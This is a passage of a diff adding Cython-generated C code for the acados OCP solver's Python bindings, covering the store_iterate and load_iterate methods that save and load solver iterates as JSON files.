__pyx_n_s_exit); if (unlikely(!__pyx_t_10)) __PYX_ERR(0, 325, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_10); + __pyx_t_1 = __Pyx_PyObject_LookupSpecial(__pyx_t_7, __pyx_n_s_enter); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 325, __pyx_L12_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_5 = NULL; + __pyx_t_6 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_1))) { + __pyx_t_5 = PyMethod_GET_SELF(__pyx_t_1); + if (likely(__pyx_t_5)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_1); + __Pyx_INCREF(__pyx_t_5); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_1, function); + __pyx_t_6 = 1; + } + } + { + PyObject *__pyx_callargs[1] = {__pyx_t_5, }; + __pyx_t_3 = __Pyx_PyObject_FastCall(__pyx_t_1, __pyx_callargs+1-__pyx_t_6, 0+__pyx_t_6); + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 325, __pyx_L12_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + } + __pyx_t_1 = __pyx_t_3; + __pyx_t_3 = 0; + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + /*try:*/ { + { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ExceptionSave(&__pyx_t_11, &__pyx_t_12, &__pyx_t_13); + __Pyx_XGOTREF(__pyx_t_11); + __Pyx_XGOTREF(__pyx_t_12); + __Pyx_XGOTREF(__pyx_t_13); + /*try:*/ { + __pyx_v_f = __pyx_t_1; + __pyx_t_1 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":326 + * # save + * with open(filename, 'w') as f: + * json.dump(solution, f, default=lambda x: x.tolist(), indent=4, sort_keys=True) # <<<<<<<<<<<<<< + * print("stored current iterate in ", os.path.join(os.getcwd(), filename)) + * + */ + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_v_json, __pyx_n_s_dump); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 326, __pyx_L16_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_7 = PyTuple_New(2); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 326, __pyx_L16_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_INCREF(__pyx_v_solution); + __Pyx_GIVEREF(__pyx_v_solution); + PyTuple_SET_ITEM(__pyx_t_7, 0, __pyx_v_solution); + __Pyx_INCREF(__pyx_v_f); + __Pyx_GIVEREF(__pyx_v_f); + PyTuple_SET_ITEM(__pyx_t_7, 1, __pyx_v_f); + __pyx_t_3 = __Pyx_PyDict_NewPresized(3); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 326, __pyx_L16_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_5 = __Pyx_CyFunction_New(&__pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_13store_iterate_lambda, 0, __pyx_n_s_store_iterate_locals_lambda, NULL, __pyx_n_s_acados_template_acados_ocp_solve, __pyx_d, NULL); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 326, __pyx_L16_error) + __Pyx_GOTREF(__pyx_t_5); + if (PyDict_SetItem(__pyx_t_3, __pyx_n_s_default, __pyx_t_5) < 0) __PYX_ERR(0, 326, __pyx_L16_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + if (PyDict_SetItem(__pyx_t_3, __pyx_n_s_indent, __pyx_int_4) < 0) __PYX_ERR(0, 326, __pyx_L16_error) + if (PyDict_SetItem(__pyx_t_3, __pyx_n_s_sort_keys, Py_True) < 0) __PYX_ERR(0, 326, __pyx_L16_error) + __pyx_t_5 = __Pyx_PyObject_Call(__pyx_t_1, __pyx_t_7, __pyx_t_3); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 326, __pyx_L16_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":325 + * + * # save + * with open(filename, 'w') as f: # <<<<<<<<<<<<<< + * json.dump(solution, f, default=lambda x: x.tolist(), indent=4, sort_keys=True) + * print("stored current iterate in ", os.path.join(os.getcwd(), filename)) + */ + } + __Pyx_XDECREF(__pyx_t_11); __pyx_t_11 = 0; + __Pyx_XDECREF(__pyx_t_12); __pyx_t_12 = 0; + __Pyx_XDECREF(__pyx_t_13); __pyx_t_13 = 0; + goto __pyx_L21_try_end; + __pyx_L16_error:; + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_XDECREF(__pyx_t_7); __pyx_t_7 = 0; + /*except:*/ { + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.store_iterate", __pyx_clineno, __pyx_lineno, __pyx_filename); + if (__Pyx_GetException(&__pyx_t_5, &__pyx_t_3, &__pyx_t_7) < 0) __PYX_ERR(0, 325, __pyx_L18_except_error) + __Pyx_XGOTREF(__pyx_t_5); + __Pyx_XGOTREF(__pyx_t_3); + __Pyx_XGOTREF(__pyx_t_7); + __pyx_t_1 = PyTuple_Pack(3, __pyx_t_5, __pyx_t_3, __pyx_t_7); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 325, __pyx_L18_except_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_14 = __Pyx_PyObject_Call(__pyx_t_10, __pyx_t_1, NULL); + __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + if (unlikely(!__pyx_t_14)) __PYX_ERR(0, 325, __pyx_L18_except_error) + __Pyx_GOTREF(__pyx_t_14); + __pyx_t_4 = __Pyx_PyObject_IsTrue(__pyx_t_14); + __Pyx_DECREF(__pyx_t_14); __pyx_t_14 = 0; + if (__pyx_t_4 < 0) __PYX_ERR(0, 325, __pyx_L18_except_error) + __pyx_t_2 = (!__pyx_t_4); + if (unlikely(__pyx_t_2)) { + __Pyx_GIVEREF(__pyx_t_5); + __Pyx_GIVEREF(__pyx_t_3); + __Pyx_XGIVEREF(__pyx_t_7); + __Pyx_ErrRestoreWithState(__pyx_t_5, __pyx_t_3, __pyx_t_7); + __pyx_t_5 = 0; __pyx_t_3 = 0; __pyx_t_7 = 0; + __PYX_ERR(0, 325, __pyx_L18_except_error) + } + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_XDECREF(__pyx_t_7); __pyx_t_7 = 0; + goto __pyx_L17_exception_handled; + } + __pyx_L18_except_error:; + __Pyx_XGIVEREF(__pyx_t_11); + __Pyx_XGIVEREF(__pyx_t_12); + __Pyx_XGIVEREF(__pyx_t_13); + __Pyx_ExceptionReset(__pyx_t_11, __pyx_t_12, __pyx_t_13); + goto __pyx_L1_error; + __pyx_L17_exception_handled:; + __Pyx_XGIVEREF(__pyx_t_11); + __Pyx_XGIVEREF(__pyx_t_12); + __Pyx_XGIVEREF(__pyx_t_13); + __Pyx_ExceptionReset(__pyx_t_11, __pyx_t_12, __pyx_t_13); + __pyx_L21_try_end:; + } + } + /*finally:*/ { + /*normal exit:*/{ + if (__pyx_t_10) { + __pyx_t_13 = __Pyx_PyObject_Call(__pyx_t_10, __pyx_tuple__17, NULL); + __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; + if (unlikely(!__pyx_t_13)) __PYX_ERR(0, 325, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_13); + __Pyx_DECREF(__pyx_t_13); __pyx_t_13 = 0; + } + goto __pyx_L15; + } + __pyx_L15:; + } + goto __pyx_L25; + __pyx_L12_error:; + __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; + goto __pyx_L1_error; + __pyx_L25:; + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":327 + * with open(filename, 'w') as f: + * json.dump(solution, f, default=lambda x: x.tolist(), indent=4, sort_keys=True) + * print("stored current iterate in ", os.path.join(os.getcwd(), filename)) # <<<<<<<<<<<<<< + * + * + */ + __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_os); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 327, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_5 = __Pyx_PyObject_GetAttrStr(__pyx_t_3, __pyx_n_s_path); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 327, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_t_3 = __Pyx_PyObject_GetAttrStr(__pyx_t_5, __pyx_n_s_join); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 327, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_GetModuleGlobalName(__pyx_t_1, __pyx_n_s_os); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 327, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_15 = __Pyx_PyObject_GetAttrStr(__pyx_t_1, __pyx_n_s_getcwd); if (unlikely(!__pyx_t_15)) __PYX_ERR(0, 327, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_15); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = NULL; + __pyx_t_6 = 0; + if (CYTHON_UNPACK_METHODS && unlikely(PyMethod_Check(__pyx_t_15))) { + __pyx_t_1 = PyMethod_GET_SELF(__pyx_t_15); + if (likely(__pyx_t_1)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_15); + __Pyx_INCREF(__pyx_t_1); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_15, function); + __pyx_t_6 = 1; + } + } + { + PyObject *__pyx_callargs[1] = {__pyx_t_1, }; + __pyx_t_5 = __Pyx_PyObject_FastCall(__pyx_t_15, __pyx_callargs+1-__pyx_t_6, 0+__pyx_t_6); + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 327, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_15); __pyx_t_15 = 0; + } + __pyx_t_15 = NULL; + __pyx_t_6 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_3))) { + __pyx_t_15 = PyMethod_GET_SELF(__pyx_t_3); + if (likely(__pyx_t_15)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); + __Pyx_INCREF(__pyx_t_15); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_3, function); + __pyx_t_6 = 1; + } + } + { + PyObject *__pyx_callargs[3] = {__pyx_t_15, __pyx_t_5, __pyx_v_filename}; + __pyx_t_7 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_6, 2+__pyx_t_6); + __Pyx_XDECREF(__pyx_t_15); __pyx_t_15 = 0; + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 327, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + } + __pyx_t_3 = PyTuple_New(2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 327, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_INCREF(__pyx_kp_u_stored_current_iterate_in); + __Pyx_GIVEREF(__pyx_kp_u_stored_current_iterate_in); + PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_kp_u_stored_current_iterate_in); + __Pyx_GIVEREF(__pyx_t_7); + PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_7); + __pyx_t_7 = 0; + __pyx_t_7 = __Pyx_PyObject_Call(__pyx_builtin_print, __pyx_t_3, NULL); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 327, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":293 + * + * + * def store_iterate(self, filename='', overwrite=False): # <<<<<<<<<<<<<< + * """ + * Stores the current iterate of the ocp solver in a json file. + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_7); + __Pyx_XDECREF(__pyx_t_15); + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.store_iterate", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_json); + __Pyx_XDECREF(__pyx_v_solution); + __Pyx_XDECREF(__pyx_v_i); + __Pyx_XDECREF(__pyx_v_f); + __Pyx_XDECREF(__pyx_v_filename); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "acados_template/acados_ocp_solver_pyx.pyx":330 + * + * + * def load_iterate(self, filename): # <<<<<<<<<<<<<< + * """ + * Loads the iterate stored in json file with filename into the ocp solver. + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_21load_iterate(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +PyDoc_STRVAR(__pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_20load_iterate, "\n Loads the iterate stored in json file with filename into the ocp solver.\n "); +static PyMethodDef __pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_21load_iterate = {"load_iterate", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_21load_iterate, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_20load_iterate}; +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_21load_iterate(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_filename = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("load_iterate (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_filename,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_filename)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 330, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "load_iterate") < 0)) __PYX_ERR(0, 330, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v_filename = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("load_iterate", 1, 1, 1, __pyx_nargs); __PYX_ERR(0, 330, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.load_iterate", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_20load_iterate(((struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *)__pyx_v_self), __pyx_v_filename); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_20load_iterate(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, PyObject *__pyx_v_filename) { + PyObject *__pyx_v_json = NULL; + PyObject *__pyx_v_f = NULL; + PyObject *__pyx_v_solution = NULL; + PyObject *__pyx_v_key = NULL; + PyObject *__pyx_v_field = NULL; + PyObject *__pyx_v_stage = NULL; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_t_4; + int __pyx_t_5; + int __pyx_t_6; + PyObject *__pyx_t_7 = NULL; + PyObject *__pyx_t_8 = NULL; + PyObject *__pyx_t_9 = NULL; + PyObject *__pyx_t_10 = NULL; + PyObject *__pyx_t_11 = NULL; + PyObject *__pyx_t_12 = NULL; + PyObject *__pyx_t_13 = NULL; + Py_ssize_t __pyx_t_14; + Py_ssize_t __pyx_t_15; + int __pyx_t_16; + PyObject *(*__pyx_t_17)(PyObject *); + PyObject *__pyx_t_18 = NULL; + PyObject *__pyx_t_19 = NULL; + PyObject *__pyx_t_20 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("load_iterate", 0); + + /* "acados_template/acados_ocp_solver_pyx.pyx":334 + * Loads the iterate stored in json file with filename into the ocp solver. + * """ + * import json # <<<<<<<<<<<<<< + * if not os.path.isfile(filename): + * raise Exception('load_iterate: failed, file does not exist: ' + os.path.join(os.getcwd(), filename)) + */ + __pyx_t_1 = __Pyx_ImportDottedModule(__pyx_n_s_json, NULL); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 334, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_v_json = __pyx_t_1; + __pyx_t_1 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":335 + * """ + * import json + * if not os.path.isfile(filename): # <<<<<<<<<<<<<< + * raise Exception('load_iterate: failed, file does not exist: ' + os.path.join(os.getcwd(), filename)) + * + */ + __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_os); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 335, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = __Pyx_PyObject_GetAttrStr(__pyx_t_2, __pyx_n_s_path); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 335, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_t_3, __pyx_n_s_isfile); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 335, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_t_3 = NULL; + __pyx_t_4 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_2))) { + __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_2); + if (likely(__pyx_t_3)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); + __Pyx_INCREF(__pyx_t_3); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_2, function); + __pyx_t_4 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_3, __pyx_v_filename}; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_4, 1+__pyx_t_4); + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 335, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + } + __pyx_t_5 = __Pyx_PyObject_IsTrue(__pyx_t_1); if (unlikely((__pyx_t_5 < 0))) __PYX_ERR(0, 335, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_6 = (!__pyx_t_5); + if (unlikely(__pyx_t_6)) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":336 + * import json + * if not os.path.isfile(filename): + * raise Exception('load_iterate: failed, file does not exist: ' + os.path.join(os.getcwd(), filename)) # <<<<<<<<<<<<<< + * + * with open(filename, 'r') as f: + */ + __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_os); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 336, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = __Pyx_PyObject_GetAttrStr(__pyx_t_2, __pyx_n_s_path); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 336, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_t_3, __pyx_n_s_join); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 336, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_GetModuleGlobalName(__pyx_t_7, __pyx_n_s_os); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 336, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __pyx_t_8 = __Pyx_PyObject_GetAttrStr(__pyx_t_7, __pyx_n_s_getcwd); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 336, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + __pyx_t_7 = NULL; + __pyx_t_4 = 0; + if (CYTHON_UNPACK_METHODS && unlikely(PyMethod_Check(__pyx_t_8))) { + __pyx_t_7 = PyMethod_GET_SELF(__pyx_t_8); + if (likely(__pyx_t_7)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_8); + __Pyx_INCREF(__pyx_t_7); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_8, function); + __pyx_t_4 = 1; + } + } + { + PyObject *__pyx_callargs[1] = {__pyx_t_7, }; + __pyx_t_3 = __Pyx_PyObject_FastCall(__pyx_t_8, __pyx_callargs+1-__pyx_t_4, 0+__pyx_t_4); + __Pyx_XDECREF(__pyx_t_7); __pyx_t_7 = 0; + if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 336, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + } + __pyx_t_8 = NULL; + __pyx_t_4 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_2))) { + __pyx_t_8 = PyMethod_GET_SELF(__pyx_t_2); + if (likely(__pyx_t_8)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); + __Pyx_INCREF(__pyx_t_8); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_2, function); + __pyx_t_4 = 1; + } + } + { + PyObject *__pyx_callargs[3] = {__pyx_t_8, __pyx_t_3, __pyx_v_filename}; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_4, 2+__pyx_t_4); + __Pyx_XDECREF(__pyx_t_8); __pyx_t_8 = 0; + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 336, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + } + __pyx_t_2 = PyNumber_Add(__pyx_kp_u_load_iterate_failed_file_does_no, __pyx_t_1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 336, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_PyObject_CallOneArg(((PyObject *)(&((PyTypeObject*)PyExc_Exception)[0])), __pyx_t_2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 336, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __Pyx_Raise(__pyx_t_1, 0, 0, 0); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __PYX_ERR(0, 336, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":335 + * """ + * import json + * if not os.path.isfile(filename): # <<<<<<<<<<<<<< + * raise Exception('load_iterate: failed, file does not exist: ' + os.path.join(os.getcwd(), filename)) + * + */ + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":338 + * raise Exception('load_iterate: failed, file does not exist: ' + os.path.join(os.getcwd(), filename)) + * + * with open(filename, 'r') as f: # <<<<<<<<<<<<<< + * solution = json.load(f) + * + */ + /*with:*/ { + __pyx_t_1 = PyTuple_New(2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 338, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(__pyx_v_filename); + __Pyx_GIVEREF(__pyx_v_filename); + PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_v_filename); + __Pyx_INCREF(__pyx_n_u_r); + __Pyx_GIVEREF(__pyx_n_u_r); + PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_n_u_r); + __pyx_t_2 = __Pyx_PyObject_Call(__pyx_builtin_open, __pyx_t_1, NULL); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 338, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_9 = __Pyx_PyObject_LookupSpecial(__pyx_t_2, __pyx_n_s_exit); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 338, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_9); + __pyx_t_3 = __Pyx_PyObject_LookupSpecial(__pyx_t_2, __pyx_n_s_enter); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 338, __pyx_L4_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_8 = NULL; + __pyx_t_4 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_3))) { + __pyx_t_8 = PyMethod_GET_SELF(__pyx_t_3); + if (likely(__pyx_t_8)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); + __Pyx_INCREF(__pyx_t_8); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_3, function); + __pyx_t_4 = 1; + } + } + { + PyObject *__pyx_callargs[1] = {__pyx_t_8, }; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_4, 0+__pyx_t_4); + __Pyx_XDECREF(__pyx_t_8); __pyx_t_8 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 338, __pyx_L4_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + } + __pyx_t_3 = __pyx_t_1; + __pyx_t_1 = 0; + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + /*try:*/ { + { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ExceptionSave(&__pyx_t_10, &__pyx_t_11, &__pyx_t_12); + __Pyx_XGOTREF(__pyx_t_10); + __Pyx_XGOTREF(__pyx_t_11); + __Pyx_XGOTREF(__pyx_t_12); + 